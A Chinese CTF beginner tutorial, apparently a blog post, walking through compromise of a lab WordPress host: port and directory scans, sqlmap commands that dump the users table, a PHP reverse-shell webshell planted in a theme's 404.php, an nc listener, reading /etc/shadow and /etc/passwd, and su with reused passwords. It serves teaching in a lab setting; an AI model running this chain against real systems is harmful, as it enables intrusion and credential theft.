6-2CTF夺旗入门教程--SQL注入POST参数-注入HTTP报文

1.信息探测
#扫描主机开放的全部端口
nmap -T4 -p- 192.168.2.117
#扫描靶场全部信息
nmap -T4 -A -v 192.168.2.117
#探测敏感信息
nikto -host http://
dirb http://
#漏洞扫描
owasp
2.漏洞利用

登录界面
在这里插入图片描述

#burpsuite抓包,需要把浏览器设置代理
#在登录界面尝试登录,抓取请求数据包,保存为request.raw文件
#用sqlmap利用漏洞

在这里插入图片描述

#查看服务器所有数据库
sqlmap -r request.raw --level 5 --risk 3 --dbs --dbms mysql --batch

在这里插入图片描述

#查看wordpress8080数据库的表名
sqlmap -r request.raw --level 5 --risk 3 -D wordpress8080 --tables --dbms mysql --batchv

在这里插入图片描述

#查看users表的列名
sqlmap -r request.raw --level 5 --risk 3 -D wordpress8080 -T users --columns --dbms mysql --batch

在这里插入图片描述

查看users表的列和值
sqlmap -r request.raw --level 5 --risk 3 -D wordpress8080 -T users -C username,password --dump --dbms mysql --batch

在这里插入图片描述

3.上传webshell获取控制权
#主题的404.php可以上传webshell
#webshell 获取 /usr/share/webshells/php/ 目录
#使用反弹shell脚本
cp php-reverse-shell.php /root/Downloads/
#修改脚本参数,攻击机IP和端口
gedit php-reverse-shell.php
#启动监听
nc -nlvp 4444
#访问页面,获取反弹shell
http://192.168.2.117:8080/wordpress/wp-content/themes/twentythirtheen/404.php
#美化终端
python -c "import pty;pty.spawn('/bin/bash')"
#查看敏感文件
cat /etc/shadow 
cat /etc/passwd
#使用su - 提权
su - 
#口令尝试wordpress8080数据库中的密码,登录成功
4.总结

只要是用户可以输入的位置都是有可能存在注入点的
漏洞扫描器的结果不一定准确

  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值